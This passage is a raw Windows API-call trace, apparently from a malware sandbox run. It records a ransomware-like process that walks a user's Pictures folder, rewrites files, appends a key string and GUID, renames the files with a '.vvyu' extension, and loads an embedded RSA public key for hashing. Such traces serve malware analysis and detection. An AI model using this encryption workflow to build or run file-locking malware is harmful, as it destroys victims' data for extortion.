(HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d00 | out: hHeap=0x6a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.354] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x17b3d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x17b3d, lpOverlapped=0x0) returned 1 [0190.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.355] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17b42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.356] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0190.357] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.358] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.358] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.358] CloseHandle (hObject=0x584) returned 1 [0190.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0190.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.360] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\rR87s4ZrE.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\rr87s4zre.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\rR87s4ZrE.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\rr87s4zre.gif.vvyu")) returned 1 [0190.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.362] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.365] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a5430, ftCreationTime.dwHighDateTime=0x1d89d63, ftLastAccessTime.dwLowDateTime=0xc364c3a0, ftLastAccessTime.dwHighDateTime=0x1d8a4e0, ftLastWriteTime.dwLowDateTime=0xc364c3a0, ftLastWriteTime.dwHighDateTime=0x1d8a4e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tE1LWlZl-CqVZeW gL", cAlternateFileName="TE1LWL~1")) returned 1 [0190.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0190.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.366] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd0d49010, ftCreationTime.dwHighDateTime=0x1d8a38c, ftLastAccessTime.dwLowDateTime=0xfec9f830, ftLastAccessTime.dwHighDateTime=0x1d8a660, ftLastWriteTime.dwLowDateTime=0xfec9f830, ftLastWriteTime.dwHighDateTime=0x1d8a660, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ths6OlVH", cAlternateFileName="")) returned 1 [0190.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0190.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x214) returned 0x2d3bb48 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ef00 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ef78 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2eff0 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2f068 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2f0e0 [0190.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0190.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fe60 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed20 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ee10 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ee88 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0190.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0190.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2eca8 [0190.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0190.370] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27530710, ftCreationTime.dwHighDateTime=0x1d89c02, ftLastAccessTime.dwLowDateTime=0x89a47410, ftLastAccessTime.dwHighDateTime=0x1d8a271, ftLastWriteTime.dwLowDateTime=0x89a47410, ftLastWriteTime.dwHighDateTime=0x1d8a271, nFileSizeHigh=0x0, nFileSizeLow=0xdb83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WajpnYwwAMaGET.bmp", cAlternateFileName="WAJPNY~1.BMP")) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.370] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\WajpnYwwAMaGET.bmp") returned=".bmp" [0190.370] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\WajpnYwwAMaGET.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\wajpnywwamaget.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.372] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=56195) returned 1 [0190.372] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.374] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdb5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.374] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.380] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.380] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xdb83, lpOverlapped=0x0) returned 1 [0190.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.381] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.382] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.382] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.382] CryptGetHashParam (in: 